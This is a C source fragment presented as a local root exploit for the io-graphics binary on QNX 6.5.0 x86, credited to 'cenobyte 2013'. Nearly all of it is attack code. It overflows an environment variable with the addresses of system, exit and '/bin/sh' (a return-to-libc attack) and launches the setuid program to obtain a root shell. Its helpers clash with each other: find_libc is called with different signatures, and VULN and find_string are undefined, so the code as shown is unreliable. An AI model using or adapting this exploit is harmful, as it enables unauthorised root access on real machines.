int
main()
{
unsigned int offset = 429;
unsigned int system_addr;
unsigned int exit_addr;
unsigned int binsh_addr;
char env[440];
char *prog[] = { "/usr/photon/bin/io-graphics", "io-graphics", NULL };
char *envp[] = { env, NULL };
printf("QNX 6.5.0 x86 io-graphics local root exploit by cenobyte 2013\n\n");
system_addr = find_libc("system");
exit_addr = find_libc("exit");
binsh_addr = find_string("/bin/sh");
memset(env, 0xEB, sizeof(env));
memcpy(env, VULN, strlen(VULN));
memcpy(env + offset, (char *)&system_addr, 4);
memcpy(env + offset + 4, (char *)&exit_addr, 4);
memcpy(env + offset + 8, (char *)&binsh_addr, 4);
execve(prog[0], prog, envp);
return(0);
}
static int
find_name(pid_t pid, char *name, unsigned long *addr)
{
struct mm mm[1000];
unsigned long libcaddr;
int nmm;
char libc[256];
symtab_t s;
if (0 > load_memmap(pid, mm, &nmm)) {
printf("cannot read memory map\n");
return -1;
}
if (0 > find_libc(libc, sizeof(libc), &libcaddr, mm, nmm)) {
printf("cannot find libc\n");
return -1;
}
s = load_symtab(libc);
if (!s) {
printf("cannot read symbol table\n");
return -1;
}
if (0 > lookup_func_sym(s, name, addr)) {
printf("cannot find %s\n", name);
return -1;
}
*addr += libcaddr;
return 0;
}
